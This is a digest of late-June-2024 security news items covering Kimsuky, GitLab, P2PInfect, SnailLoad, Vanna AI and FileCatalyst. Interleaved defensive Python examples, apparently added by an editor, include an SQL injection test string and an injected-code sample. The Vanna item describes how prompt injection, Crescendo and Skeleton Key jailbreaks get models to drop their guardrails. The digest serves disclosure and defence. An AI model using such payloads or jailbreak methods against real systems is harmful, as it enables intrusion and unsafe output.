

Kimsuky Using TRANSLATEXT Chrome Extension to Steal Sensitive Data
29.6.24 
APT  The Hacker News
The North Korea-linked threat actor known as Kimsuky has been linked to the use of a new malicious Google Chrome extension that's designed to steal sensitive information as part of an ongoing intelligence collection effort.

Zscaler ThreatLabz, which observed the activity in early March 2024, has codenamed the extension TRANSLATEXT, highlighting its ability to gather email addresses, usernames, passwords, cookies, and browser screenshots.

The targeted campaign is said to have been directed against South Korean academia, specifically those focused on North Korean political affairs.

Kimsuky is a notorious hacking crew from North Korea that's known to be active since at least 2012, orchestrating cyber espionage and financially motivated attacks targeting South Korean entities.

A sister group of the Lazarus cluster and part of the Reconnaissance General Bureau (RGB), it's also tracked under the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, Springtail, and Velvet Chollima.

In recent weeks, the group has weaponized a known security flaw in Microsoft Office (CVE-2017-11882) to distribute a keylogger and has used job-themed lures in attacks aimed at aerospace and defense sectors with an aim to drop an espionage tool with data gathering and secondary payload execution functionalities.

"The backdoor, which does not appear to have been publicly documented before, allows the attacker to perform basic reconnaissance and drop additional payloads to take over or remotely control the machine," cybersecurity company CyberArmor said. It has given the campaign the name Niki.


The exact mode of initial access associated with the newly discovered activity is currently unclear, although the group is known to leverage spear-phishing and social engineering attacks to activate the infection chain.

The starting point of the attack is a ZIP archive that purports to be about Korean military history and which contains two files: A Hangul Word Processor document and an executable.

Launching the executable results in the retrieval of a PowerShell script from an attacker-controlled server, which, in turn, exports information about the compromised victim to a GitHub repository and downloads additional PowerShell code by means of a Windows shortcut (LNK) file.

Zscaler said it found the GitHub account, created on February 13, 2024, briefly hosting the TRANSLATEXT extension under the name "GoogleTranslate.crx," although its delivery method is presently unknown.

"These files were present in the repository on March 7, 2024, and deleted the next day, implying that Kimsuky intended to minimize exposure and use the malware for a short period to target specific individuals," security researcher Seongsu Park said.

TRANSLATEXT, which masquerades as Google Translate, incorporates JavaScript code to bypass security measures for services like Google, Kakao, and Naver; siphon email addresses, credentials, and cookies; capture browser screenshots; and exfiltrate stolen data.

It's also designed to fetch commands from a Blogger Blogspot URL in order to take screenshots of newly opened tabs and delete all cookies from the browser, among others.

"One of the primary objectives of the Kimsuky group is to conduct surveillance on academic and government personnel in order to gather valuable intelligence," Park said.


GitLab Releases Patch for Critical CI/CD Pipeline Vulnerability and 13 Others
29.6.24 
Vulnerability  The Hacker News
GitLab has released security updates to address 14 security flaws, including one critical vulnerability that could be exploited to run continuous integration and continuous deployment (CI/CD) pipelines as any user.

The weaknesses, which affect GitLab Community Edition (CE) and Enterprise Edition (EE), have been addressed in versions 17.1.1, 17.0.3, and 16.11.5.

The most severe of the vulnerabilities is CVE-2024-5655 (CVSS score: 9.6), which could permit a malicious actor to trigger a pipeline as another user under certain circumstances.

It impacts the following versions of CE and EE -

17.1 prior to 17.1.1
17.0 prior to 17.0.3, and
15.8 prior to 16.11.5

GitLab said the fix introduces two breaking changes as a result of which GraphQL authentication using CI_JOB_TOKEN is disabled by default and pipelines will no longer run automatically when a merge request is re-targeted after its previous target branch is merged.


Some of the other important flaws fixed as part of the latest release are listed below -

CVE-2024-4901 (CVSS score: 8.7) - A stored XSS vulnerability could be imported from a project with malicious commit notes
CVE-2024-4994 (CVSS score: 8.1) - A CSRF attack on GitLab's GraphQL API leading to the execution of arbitrary GraphQL mutations
CVE-2024-6323 (CVSS score: 7.5) - An authorization flaw in the global search feature that allows for leakage of sensitive information from a private repository within a public project
CVE-2024-2177 (CVSS score: 6.8) - A cross window forgery vulnerability that enables an attacker to abuse the OAuth authentication flow via a crafted payload

While there is no evidence of active exploitation of the flaws, users are advised to apply the patches to mitigate potential threats.


8220 Gang Exploits Oracle WebLogic Server Flaws for Cryptocurrency Mining
28.6.24  Exploit 
The Hacker News
Security researchers have shed more light on the cryptocurrency mining operation conducted by the 8220 Gang by exploiting known security flaws in the Oracle WebLogic Server.

"The threat actor employs fileless execution techniques, using DLL reflective and process injection, allowing the malware code to run solely in memory and avoid disk-based detection mechanisms," Trend Micro researchers Ahmed Mohamed Ibrahim, Shubham Singh, and Sunil Bharti said in a new analysis published today.

The cybersecurity firm is tracking the financially motivated actor under the name Water Sigbin, which is known to weaponize vulnerabilities in Oracle WebLogic Server such as CVE-2017-3506, CVE-2017-10271, and CVE-2023-21839 for initial access and drop the miner payload via a multi-stage loading technique.

A successful foothold is followed by the deployment of a PowerShell script that's responsible for dropping a first-stage loader ("wireguard2-3.exe") that mimics the legitimate WireGuard VPN application, but, in reality, launches another binary ("cvtres.exe") in memory by means of a DLL ("Zxpus.dll").

The injected executable serves as a conduit to load the PureCrypter loader ("Tixrgtluffu.dll") that, in turn, exfiltrates hardware information to a remote server and creates scheduled tasks to run the miner as well as excludes the malicious files from Microsoft Defender Antivirus.

The command-and-control (C2) server then responds with an encrypted message containing the XMRig configuration details, after which the loader retrieves and executes the miner from an attacker-controlled domain, masquerading it as "AddinProcess.exe," a legitimate Microsoft binary.


The development comes as the QiAnXin XLab team detailed a new installer tool used by the 8220 Gang called k4spreader since at least February 2024 to deliver the Tsunami DDoS botnet and the PwnRig mining program.

The malware, which is currently under development and has a shell version, has been leveraging security flaws such as Apache Hadoop YARN, JBoss, and Oracle WebLogic Server to infiltrate susceptible targets.

"k4spreader is written in cgo, including system persistence, downloading and updating itself, and releasing other malware for execution," the company said, adding it's also designed to disable the firewall, terminate rival botnets (e.g., kinsing), and print operational status.


New SnailLoad Attack Exploits Network Latency to Spy on Users' Web Activities
28.6.24  Exploit 
The Hacker News
A group of security researchers from the Graz University of Technology have demonstrated a new side-channel attack known as SnailLoad that could be used to remotely infer a user's web activity.

"SnailLoad exploits a bottleneck present on all Internet connections," the researchers said in a study released this week.

"This bottleneck influences the latency of network packets, allowing an attacker to infer the current network activity on someone else's Internet connection. An attacker can use this information to infer websites a user visits or videos a user watches."

A defining characteristic of the approach is that it obviates the need for carrying out an adversary-in-the-middle (AitM) attack or being in physical proximity to the Wi-Fi connection to sniff network traffic.

Specifically, it entails tricking a target into loading a harmless asset (e.g., a file, an image, or an ad) from a threat actor-controlled server, which then exploits the victim's network latency as a side channel to determine online activities on the victim system.

To perform such a fingerprinting attack and glean what video or website a user might be watching or visiting, the attacker conducts a series of latency measurements of the victim's network connection as the content is downloaded from the server while the victim is browsing or viewing.

It then involves a post-processing phase that employs a convolutional neural network (CNN) trained with traces from an identical network setup to make the inference with an accuracy of up to 98% for videos and 63% for websites.

In other words, due to the network bottleneck on the victim's side, the adversary can deduce the transmitted amount of data by measuring the packet round trip time (RTT). The RTT traces are unique per video and can be used to classify the video watched by the victim.

The attack is so named because the attacking server transmits the file at a snail's pace in order to monitor the connection latency over an extended period of time.

"SnailLoad requires no JavaScript, no form of code execution on the victim system, and no user interaction but only a constant exchange of network packets," the researchers explained, adding it "measures the latency to the victim system and infers the network activity on the victim system from the latency variations."

"The root cause of the side-channel is buffering in a transport path node, typically the last node before the user's modem or router, related to a quality-of-service issue called bufferbloat."
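The bufferbloat mechanism the researchers point to can be made concrete with a small queue simulation. The following is an added example, not code from the SnailLoad paper or from this article: it models the last-hop link as a tail-drop FIFO shared by the victim's own download and a stream of small probe packets, and compares a bloated buffer with a right-sized one. The link rate, buffer sizes, chunk pattern and base RTT are constructed values chosen for illustration.

```python
from dataclasses import dataclass


@dataclass
class BottleneckLink:
    rate_bytes_per_ms: float  # drain rate of the last-hop link; 1000 B/ms is 8 Mbit/s
    buffer_bytes: int         # queue capacity; a large value models a bloated buffer


def simulate_probe_rtts(link: BottleneckLink, cross_traffic_bytes: list[int],
                        probe_bytes: int = 64, base_rtt_ms: float = 20.0) -> list[float]:
    """Toy model of the side channel's root cause.

    One small probe packet per millisecond shares a tail-drop FIFO queue with the victim's own
    download. cross_traffic_bytes[i] is how many bytes of the victim's traffic arrive in ms i.
    Returns the RTT each probe sees: the base path RTT plus the queueing delay in the bottleneck.
    """
    queue = 0.0
    rtts = []
    for arriving in cross_traffic_bytes:
        # the victim's bytes enter first; anything beyond the buffer is dropped (tail drop)
        queue = min(queue + arriving, link.buffer_bytes)
        # the probe waits behind everything already queued
        rtts.append(base_rtt_ms + queue / link.rate_bytes_per_ms)
        # enqueue the probe, then let the link drain one millisecond's worth of bytes
        queue = max(0.0, min(queue + probe_bytes, link.buffer_bytes) - link.rate_bytes_per_ms)
    return rtts


def video_chunk_pattern(idle_ms: int = 10, burst_ms: int = 20,
                        burst_bytes_per_ms: int = 5000, tail_ms: int = 20) -> list[int]:
    """Constructed traffic shape: silence, a chunk arriving faster than the link drains, silence."""
    return [0] * idle_ms + [burst_bytes_per_ms] * burst_ms + [0] * tail_ms


def delay_excursion_ms(rtts: list[float], base_rtt_ms: float = 20.0) -> float:
    """Size of the signal available to an observer: how far the RTT climbs above the idle baseline."""
    return max(rtts) - base_rtt_ms


if __name__ == "__main__":
    pattern = video_chunk_pattern()
    bloated = BottleneckLink(rate_bytes_per_ms=1000, buffer_bytes=200_000)
    capped = BottleneckLink(rate_bytes_per_ms=1000, buffer_bytes=10_000)
    for name, link in (("bloated buffer", bloated), ("small buffer", capped)):
        rtts = simulate_probe_rtts(link, pattern)
        print(f"{name}: RTT excursion {delay_excursion_ms(rtts):.1f} ms, "
              f"peak RTT {max(rtts):.1f} ms, idle RTT {rtts[0]:.1f} ms")
```

With the bloated buffer the probe RTT climbs by roughly 82 ms while the chunk drains, which is the per-video shape the paper's classifier learns; with a 10 KB buffer the excursion is capped at 10 ms. Real traces are far noisier than this model, but the lever for a defender is the same: active queue management (fq_codel or CAKE on the home router) or a right-sized buffer keeps the standing queue small and shrinks the channel.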

The disclosure comes as academics have described a security flaw in the way router firmware handles Network Address Translation (NAT) mapping that could be exploited by an attacker connected to the same Wi-Fi network as the victim to bypass built-in randomization in the Transmission Control Protocol (TCP).

"Most routers, for performance reasons, do not rigorously inspect the sequence numbers of TCP packets," the researchers said. "Consequently, this introduces serious security vulnerabilities that attackers can exploit by crafting forged reset (RST) packets to maliciously clear NAT mappings in the router."

The attack essentially allows the threat actor to infer the source ports of other client connections as well as steal the sequence number and acknowledgment number of the normal TCP connection between the victim client and the server in order to perform TCP connection manipulation.

The hijacking attacks targeting TCP could then be weaponized to poison a victim's HTTP web page or stage denial-of-service (DoS) attacks, per the researchers, who said patches for the vulnerability are being readied by the OpenWrt community as well as router vendors like 360, Huawei, Linksys, Mercury, TP-Link, Ubiquiti, and Xiaomi.


Researchers Warn of Flaws in Widely Used Industrial Gas Analysis Equipment
28.6.24 
Vulnerability  The Hacker News
Multiple security flaws have been disclosed in Emerson Rosemount gas chromatographs that could be exploited by malicious actors to obtain sensitive information, induce a denial-of-service (DoS) condition, and even execute arbitrary commands.

The flaws impact GC370XA, GC700XA, and GC1500XA and reside in versions 4.1.5 and prior.

According to operational technology (OT) security firm Claroty, the vulnerabilities include two command injection flaws and two separate authentication and authorization vulnerabilities that could be weaponized by unauthenticated attackers to perform a wide range of malicious actions ranging from authentication bypass to command injection.

"Successful exploitation of these vulnerabilities could allow an unauthenticated attacker with network access to run arbitrary commands, access sensitive information, cause a denial-of-service condition, and bypass authentication to acquire admin capabilities," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in an advisory released in January.

The chromatograph, which is used for carrying out critical gas measurements, can be configured and managed by means of a software called MON. The software can also be used to store critical data and generate reports such as chromatograms, alarm history, event logs, and maintenance logs.


Claroty's analysis of the firmware and the proprietary protocol used for communications between the device and the Windows client named MON2020 has revealed the following shortcomings -

CVE-2023-46687 (CVSS score: 9.8) - An unauthenticated user with network access could execute arbitrary commands in root context from a remote computer
CVE-2023-49716 (CVSS score: 6.9) - An authenticated user with network access could run arbitrary commands from a remote computer
CVE-2023-51761 (CVSS score: 8.3) - An unauthenticated user with network access could bypass authentication and acquire admin capabilities by resetting the associated password
CVE-2023-43609 (CVSS score: 6.9) - An unauthenticated user with network access could obtain access to sensitive information or cause a denial-of-service condition

Following responsible disclosure, Emerson has released an updated version of the firmware that addresses the vulnerabilities. The company also recommends that end users follow cybersecurity best practices and ensure that the affected products are not directly exposed to the internet.

The disclosure comes as Nozomi Networks detailed several flaws in AiLux RTU62351B that could be abused to access sensitive resources on the device, alter its configuration, and even achieve execution of arbitrary commands as root. The vulnerabilities have been collectively dubbed I11USION.

Security flaws have also been identified in Proges Plus temperature monitoring devices and their associated software, namely Sensor Net Connect and Thermoscan IP, that could permit admin privileges over critical medical systems, thereby making it possible for a malicious actor to manipulate system settings, install malware, and exfiltrate data.

These vulnerabilities, which remain unpatched, could also result in a DoS condition of medical monitoring infrastructure, leading to spoilage of temperature-sensitive medicines and vaccines.


TeamViewer Detects Security Breach in Corporate IT Environment
28.6.24 
Incident  The Hacker News
TeamViewer on Thursday disclosed it detected an "irregularity" in its internal corporate IT environment on June 26, 2024.

"We immediately activated our response team and procedures, started investigations together with a team of globally renowned cyber security experts and implemented necessary remediation measures," the company said in a statement.

It further noted that its corporate IT environment is completely cut off from the product environment and that there is no evidence to indicate that any customer data has been impacted as a result of the incident.

It did not disclose any details as to who may have been behind the intrusion and how they were able to pull it off, but said an investigation is underway and that it would provide status updates as and when new information becomes available.

TeamViewer, based in Germany, is the maker of remote monitoring and management (RMM) software that allows managed service providers (MSPs) and IT departments to manage servers, workstations, network devices, and endpoints. It's used by over 600,000 customers.

Interestingly, the U.S. Health Information Sharing and Analysis Center (Health-ISAC) has issued a bulletin about threat actors' active exploitation of TeamViewer, according to the American Hospital Association (AHA).

"Threat actors have been observed leveraging remote access tools," the non-profit reportedly said. "Teamviewer has been observed being exploited by threat actors associated with APT29."

It's currently unclear whether this means the attackers are abusing shortcomings in TeamViewer to breach customer networks, using poor security practices to infiltrate targets and deploy the software, or have carried out an attack on TeamViewer's own systems.

APT29, also called BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard, and The Dukes, is a state-sponsored threat actor affiliated with the Russian Foreign Intelligence Service (SVR). Recently, it was linked to the breaches of Microsoft and Hewlett Packard Enterprise (HPE).

Microsoft has since revealed that some customer email inboxes were also accessed by APT29 following the hack that came to light earlier this year, per reports from Bloomberg and Reuters.

"This week we are continuing notifications to customers who corresponded with Microsoft corporate email accounts that were exfiltrated by the Midnight Blizzard threat actor," the tech giant was quoted as saying to the news agency.


Rust-Based P2PInfect Botnet Evolves with Miner and Ransomware Payloads
28.6.24 
Ransom  The Hacker News
The peer-to-peer malware botnet known as P2PInfect has been found targeting misconfigured Redis servers with ransomware and cryptocurrency miners.

The development marks the threat's transition from what appeared to be a dormant botnet with unclear motives to a financially motivated operation.

"With its latest updates to the crypto miner, ransomware payload, and rootkit elements, it demonstrates the malware author's continued efforts into profiting off their illicit access and spreading the network further, as it continues to worm across the internet," Cado Security said in a report published this week.

P2PInfect came to light nearly a year ago, and has since received updates to target MIPS and ARM architectures. Earlier this January, Nozomi Networks uncovered the use of the malware to deliver miner payloads.

It typically spreads by targeting Redis servers and its replication feature to transform victim systems into a follower node of the attacker-controlled server, subsequently allowing the threat actor to issue arbitrary commands to them.

The Rust-based worm also features the ability to scan the internet for more vulnerable servers, not to mention incorporating an SSH password sprayer module that attempts to log in using common passwords.

Besides taking steps to prevent other attackers from targeting the same server, P2PInfect is known to change the passwords of other users, restart the SSH service with root permissions, and even perform privilege escalation.

"As the name suggests, it is a peer-to-peer botnet, where every infected machine acts as a node in the network, and maintains a connection to several other nodes," security researcher Nate Bill said.

"This results in the botnet forming a huge mesh network, which the malware author makes use of to push out updated binaries across the network, via a gossip mechanism. The author simply needs to notify one peer, and it will inform all its peers and so on until the new binary is fully propagated across the network."

The new behavioral changes to P2PInfect include the use of the malware to drop miner and ransomware payloads, the latter of which is designed to encrypt files matching certain file extensions and deliver a ransom note urging the victims to pay 1 XMR (~$165).

"As this is an untargeted and opportunistic attack, it is likely the victims are to be low value, so having a low price is to be expected," Bill pointed out.

Also of note is a new usermode rootkit that makes use of the LD_PRELOAD environment variable to hide its malicious processes and files from security tools, a technique also adopted by other cryptojacking groups like TeamTNT.

It's suspected that P2PInfect is advertised as a botnet-for-hire service, acting as a conduit to deploy other attackers' payloads in exchange for payment.

This theory is bolstered by the fact that the wallet addresses for the miner and ransomware are different, and that the miner process is configured to take up as much processing power as possible, causing it to interfere with the functioning of the ransomware.

"The choice of a ransomware payload for malware primarily targeting a server that stores ephemeral in-memory data is an odd one, and P2Pinfect will likely see far more profit from their miner than their ransomware due to the limited amount of low-value files it can access due to its permission level," Bill said.

"The introduction of the usermode rootkit is a 'good on paper' addition to the malware. If the initial access is Redis, the usermode rootkit will also be completely ineffective as it can only add the preload for the Redis service account, which other users will likely not log in as."
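Because an LD_PRELOAD rootkit has to leave its library path either in /etc/ld.so.preload or in a process's environment, both are cheap places for a defender to look. The following checker is an added example written for this article, not code from Cado Security or from P2PInfect: it parses the preload file format and the NUL-separated /proc/PID/environ format, and flags any preloaded library outside a set of trusted library directories. The trusted-directory list and the sample inputs (a preload file and two process environments, one for a Redis service account) are constructed for the example; a library a root-level intruder planted under /usr/lib would pass this path heuristic and needs corroboration, for instance by verifying it against the package manager.

```python
import os
import re

# Where a legitimately preloaded library would normally live (an assumption for this example;
# tune it to the distribution's layout).
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")


def parse_preload_file(text: str) -> list[str]:
    """Parse /etc/ld.so.preload: library paths separated by whitespace or colons, '#' starts a comment."""
    libs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            libs.extend(p for p in re.split(r"[\s:]+", line) if p)
    return libs


def parse_environ(environ: bytes) -> dict[str, str]:
    """Parse the NUL-separated KEY=VALUE format of /proc/<pid>/environ."""
    env = {}
    for item in environ.split(b"\x00"):
        if b"=" in item:
            key, value = item.split(b"=", 1)
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def is_suspicious_preload(path: str) -> bool:
    """Flag preloads outside trusted library directories; normpath defeats '/usr/lib/../../tmp' tricks."""
    return not os.path.normpath(path).startswith(TRUSTED_LIB_DIRS)


def scan(preload_text: str, process_environs: dict[int, bytes]) -> list[dict]:
    """Return findings from the preload file contents and a {pid: environ bytes} map."""
    findings = []
    for lib in parse_preload_file(preload_text):
        if is_suspicious_preload(lib):
            findings.append({"source": "/etc/ld.so.preload", "pid": None, "library": lib})
    for pid, environ in process_environs.items():
        preload = parse_environ(environ).get("LD_PRELOAD", "")
        for lib in re.split(r"[\s:]+", preload):
            if lib and is_suspicious_preload(lib):
                findings.append({"source": "LD_PRELOAD", "pid": pid, "library": lib})
    return findings


def scan_live() -> list[dict]:
    """Collect the real inputs from a Linux host (reading other users' environ files needs root)."""
    preload_text = ""
    if os.path.exists("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload", encoding="utf-8", errors="replace") as fh:
            preload_text = fh.read()
    environs = {}
    for entry in os.listdir("/proc"):
        if entry.isdigit():
            try:
                with open(f"/proc/{entry}/environ", "rb") as fh:
                    environs[int(entry)] = fh.read()
            except OSError:
                continue  # process exited or is not readable
    return scan(preload_text, environs)


# Constructed sample inputs: a preload file with one packaged library and one planted in /tmp,
# and two processes, one of which carries an LD_PRELOAD pointing into /dev/shm.
SAMPLE_PRELOAD = (
    "# constructed sample\n"
    "/usr/lib/x86_64-linux-gnu/libfakeroot/libfakeroot-sysv.so\n"
    "/tmp/.x/libhide.so\n"
)
SAMPLE_ENVIRONS = {
    1: b"PATH=/usr/bin\x00HOME=/root\x00",
    4242: b"PATH=/usr/bin\x00LD_PRELOAD=/dev/shm/.lib/libproc.so\x00HOME=/var/lib/redis\x00",
}

if __name__ == "__main__":
    for finding in scan(SAMPLE_PRELOAD, SAMPLE_ENVIRONS):
        print(finding)
```

Run scan_live() from a root shell or an EDR collector to check a real host; the per-process view matters here because, as Bill notes, a preload planted by a Redis-level compromise only lands in that service account's environment and will not be visible in the environment of an administrator's own shell.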

The disclosure follows AhnLab Security Intelligence Center's (ASEC) revelations that vulnerable web servers that have unpatched flaws or are poorly secured are being targeted by suspected Chinese-speaking threat actors to deploy crypto miners.

"Remote control is facilitated through installed web shells and NetCat, and given the installation of proxy tools aimed at RDP access, data exfiltration by the threat actors is a distinct possibility," ASEC said, highlighting the use of Behinder, China Chopper, Godzilla, BadPotato, cpolar, and RingQ.

It also comes as Fortinet FortiGuard Labs pointed out that botnets such as UNSTABLE, Condi, and Skibidi are abusing legitimate cloud storage and computing services operators to distribute malware payloads and updates to a broad range of devices.

"Using cloud servers for [command-and-control] operations ensures persistent communication with compromised devices, making it harder for defenders to disrupt an attack," security researchers Cara Lin and Vincent Li said.


Prompt Injection Flaw in Vanna AI Exposes Databases to RCE Attacks
28.6.24 
AI  The Hacker News
Cybersecurity researchers have disclosed a high-severity security flaw in the Vanna.AI library that could be exploited to achieve remote code execution via prompt injection techniques.

The vulnerability, tracked as CVE-2024-5565 (CVSS score: 8.1), relates to a case of prompt injection in the "ask" function that could be exploited to trick the library into executing arbitrary commands, supply chain security firm JFrog said.

Vanna is a Python-based machine learning library that allows users to chat with their SQL database to glean insights by "just asking questions" (aka prompts) that are translated into an equivalent SQL query using a large language model (LLM).

The rapid rollout of generative artificial intelligence (AI) models in recent years has brought to the fore the risks of exploitation by malicious actors, who can weaponize the tools by providing adversarial inputs that bypass the safety mechanisms built into them.

One such prominent class of attacks is prompt injection, which refers to a type of AI jailbreak that can be used to disregard guardrails erected by LLM providers to prevent the production of offensive, harmful, or illegal content, or carry out instructions that violate the intended purpose of the application.

Such attacks can be indirect, wherein a system processes data controlled by a third party (e.g., incoming emails or editable documents) to launch a malicious payload that leads to an AI jailbreak.

They can also take the form of what's called a many-shot jailbreak or multi-turn jailbreak (aka Crescendo) in which the operator "starts with harmless dialogue and progressively steers the conversation toward the intended, prohibited objective."

This approach can be extended further to pull off another novel jailbreak attack known as Skeleton Key.

"This AI jailbreak technique works by using a multi-turn (or multiple step) strategy to cause a model to ignore its guardrails," Mark Russinovich, chief technology officer of Microsoft Azure, said. "Once guardrails are ignored, a model will not be able to determine malicious or unsanctioned requests from any other."

Skeleton Key is also different from Crescendo in that once the jailbreak is successful and the system rules are changed, the model can create responses to questions that would otherwise be forbidden regardless of the ethical and safety risks involved.

"When the Skeleton Key jailbreak is successful, a model acknowledges that it has updated its guidelines and will subsequently comply with instructions to produce any content, no matter how much it violates its original responsible AI guidelines," Russinovich said.


"Unlike other jailbreaks like Crescendo, where models must be asked about tasks indirectly or with encodings, Skeleton Key puts the models in a mode where a user can directly request tasks. Further, the model's output appears to be completely unfiltered and reveals the extent of a model's knowledge or ability to produce the requested content."

The latest findings from JFrog – also independently disclosed by Tong Liu – show how prompt injections could have severe impacts, particularly when they are tied to command execution.

CVE-2024-5565 takes advantage of the fact that Vanna facilitates text-to-SQL generation to create SQL queries, which are then executed and graphically presented to users using the Plotly graphing library.

This is accomplished by means of an "ask" function – e.g., vn.ask("What are the top 10 customers by sales?") – which is one of the main API endpoints that enables the generation of SQL queries to be run on the database.

The aforementioned behavior, coupled with the dynamic generation of the Plotly code, creates a security hole that allows a threat actor to submit a specially crafted prompt embedding a command to be executed on the underlying system.

"The Vanna library uses a prompt function to present the user with visualized results; it is possible to alter the prompt using prompt injection and run arbitrary Python code instead of the intended visualization code," JFrog said.

"Specifically, allowing external input to the library's 'ask' method with 'visualize' set to True (default behavior) leads to remote code execution."

Following responsible disclosure, Vanna has issued a hardening guide that warns users that the Plotly integration could be used to generate arbitrary Python code and that users exposing this function should do so in a sandboxed environment.
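The weak spot JFrog describes is that model-generated Python is handed straight to the interpreter. A sandbox, as Vanna's hardening guide recommends, is the primary control; a static gate on the generated code is a cheap second layer that rejects obviously injected payloads before they reach the sandbox. The following is an added example written for this article, not Vanna's own code or JFrog's proof of concept: it parses the generated code into a syntax tree, allows imports only from plotting and dataframe packages, and bans names and attributes that reach the interpreter or the OS. The allow-list, the banned names and the two sample snippets (one benign, one with an injected subprocess call) are assumptions constructed for the example.

```python
import ast

# Policy for LLM-generated visualization code (assumptions made for this example, not Vanna's own rules):
# only plotting/dataframe packages may be imported, and builtins that reach the interpreter or OS are banned.
ALLOWED_IMPORT_ROOTS = {"plotly", "pandas"}
FORBIDDEN_NAMES = {
    "exec", "eval", "compile", "__import__", "open", "input", "breakpoint",
    "getattr", "setattr", "delattr", "globals", "locals", "vars",
}


def validate_plot_code(code: str) -> list[str]:
    """Statically check generated Python before it is executed.

    Returns a list of policy violations; an empty list means the code passed the gate.
    The check runs on the syntax tree, so string tricks inside the code cannot hide an import.
    """
    try:
        tree = ast.parse(code)
    except SyntaxError as exc:
        return [f"syntax error: {exc.msg}"]

    violations = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] not in ALLOWED_IMPORT_ROOTS:
                    violations.append(f"import of {alias.name!r} is not allowed")
        elif isinstance(node, ast.ImportFrom):
            root = (node.module or "").split(".")[0]
            if root not in ALLOWED_IMPORT_ROOTS:
                violations.append(f"import from {node.module!r} is not allowed")
        elif isinstance(node, ast.Name) and node.id in FORBIDDEN_NAMES:
            violations.append(f"use of {node.id!r} is not allowed")
        elif isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            # blocks escapes such as obj.__class__.__subclasses__()
            violations.append(f"dunder attribute {node.attr!r} is not allowed")
    return violations


def gate_generated_code(code: str) -> bool:
    """Decision for the calling application: True means the code may be handed to the sandboxed runner."""
    return validate_plot_code(code) == []


# Constructed sample: what a well-behaved text-to-SQL/plot step might produce for the "top 10 customers" question
BENIGN_CODE = """
import plotly.express as px
fig = px.bar(df, x="customer", y="sales", title="Top 10 customers by sales")
fig.show()
"""

# Constructed sample: plotting code with an injected OS command, the shape of payload CVE-2024-5565 describes
INJECTED_CODE = """
import plotly.express as px
import subprocess
subprocess.run(["echo", "injected"])
fig = px.bar(df, x="customer", y="sales")
"""

if __name__ == "__main__":
    for label, code in (("benign", BENIGN_CODE), ("injected", INJECTED_CODE)):
        print(label, "->", validate_plot_code(code) or "passed")
```

The gate is deliberately an allow-list: anything not recognisably plotting code is rejected rather than trying to enumerate bad patterns. It is still not a substitute for running the accepted code in an isolated process with no network and no database credentials, since Python's dynamic features leave room for constructions a syntactic check does not anticipate.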

"This discovery demonstrates that the risks of widespread use of GenAI/LLMs without proper governance and security can have drastic implications for organizations," Shachar Menashe, senior director of security research at JFrog, said in a statement.

"The dangers of prompt injection are still not widely well known, but they are easy to execute. Companies should not rely on pre-prompting as an infallible defense mechanism and should employ more robust mechanisms when interfacing LLMs with critical resources such as databases or dynamic code generation."


Critical SQLi Vulnerability Found in Fortra FileCatalyst Workflow Application
28.6.24 
Vulnerability  The Hacker News
A critical security flaw has been disclosed in Fortra FileCatalyst Workflow that, if left unpatched, could allow an attacker to tamper with the application database.

Tracked as CVE-2024-5276, the vulnerability carries a CVSS score of 9.8. It impacts FileCatalyst Workflow versions 5.1.6 Build 135 and earlier. It has been addressed in version 5.1.6 Build 139.

"An SQL injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data," Fortra said in an advisory published Tuesday. "Likely impacts include creation of administrative users and deletion or modification of data in the application database."

It also emphasized that successful unauthenticated exploitation requires a Workflow system with anonymous access enabled. Alternatively, it can also be abused by an authenticated user.

Users who cannot apply the patches immediately can disable the vulnerable servlets – csv_servlet, pdf_servlet, xml_servlet, and json_servlet – in the "web.xml" file located in the Apache Tomcat installation directory as temporary workarounds.

Cybersecurity firm Tenable, which reported the flaw on May 22, 2024, has since released a proof-of-concept (PoC) exploit for the flaw.

"A user-supplied jobID is used to form the WHERE clause in an SQL query," it said. "An anonymous remote attacker can perform SQLi via the JOBID parameter in various URL endpoints of the workflow web application."
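The pattern Tenable describes, a request parameter spliced into a WHERE clause, is the textbook SQL injection shape. The following is an added example, not FileCatalyst code (which is a Java/Tomcat application) and not Tenable's proof of concept: it uses Python and an in-memory SQLite table to put the vulnerable query beside the parameterized one so the difference in behaviour on tampered input is visible. The table, its rows and the job lookups are constructed for the example.

```python
import sqlite3


def make_sample_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a workflow job table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jobs (job_id INTEGER PRIMARY KEY, owner TEXT, status TEXT)")
    conn.executemany(
        "INSERT INTO jobs VALUES (?, ?, ?)",
        [(1, "alice", "done"), (2, "bob", "running"), (3, "carol", "failed")],
    )
    return conn


def get_job_vulnerable(conn: sqlite3.Connection, job_id: str) -> list[tuple]:
    """Vulnerable pattern: the request parameter is concatenated into the WHERE clause as text,
    so whatever the client sends becomes part of the SQL statement."""
    query = f"SELECT job_id, owner, status FROM jobs WHERE job_id = {job_id}"
    return conn.execute(query).fetchall()


def get_job_fixed(conn: sqlite3.Connection, job_id: str) -> list[tuple]:
    """Hardened pattern: validate the expected type, then bind the value as a query parameter
    so the driver treats it as data and it can never become SQL."""
    if not job_id.isdigit():
        raise ValueError("jobID must be a positive integer")
    query = "SELECT job_id, owner, status FROM jobs WHERE job_id = ?"
    return conn.execute(query, (int(job_id),)).fetchall()


if __name__ == "__main__":
    db = make_sample_db()
    print("vulnerable, normal input:", get_job_vulnerable(db, "2"))
    print("vulnerable, tampered input:", get_job_vulnerable(db, "2 OR 1=1"))
    print("fixed, normal input:", get_job_fixed(db, "2"))
    try:
        get_job_fixed(db, "2 OR 1=1")
    except ValueError as exc:
        print("fixed, tampered input rejected:", exc)
```

With the concatenated query the tampered value widens the WHERE clause and every row comes back, which is the "modify application data" class of impact Fortra warns about when the same shape is used in an UPDATE or INSERT. Type validation plus a bound parameter closes it; the servlet workaround in the advisory is the right stopgap only until the patched build is deployed.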


Exploit Attempts Recorded Against New MOVEit Transfer Vulnerability - Patch ASAP!
27.6.24 
Exploit  The Hacker News
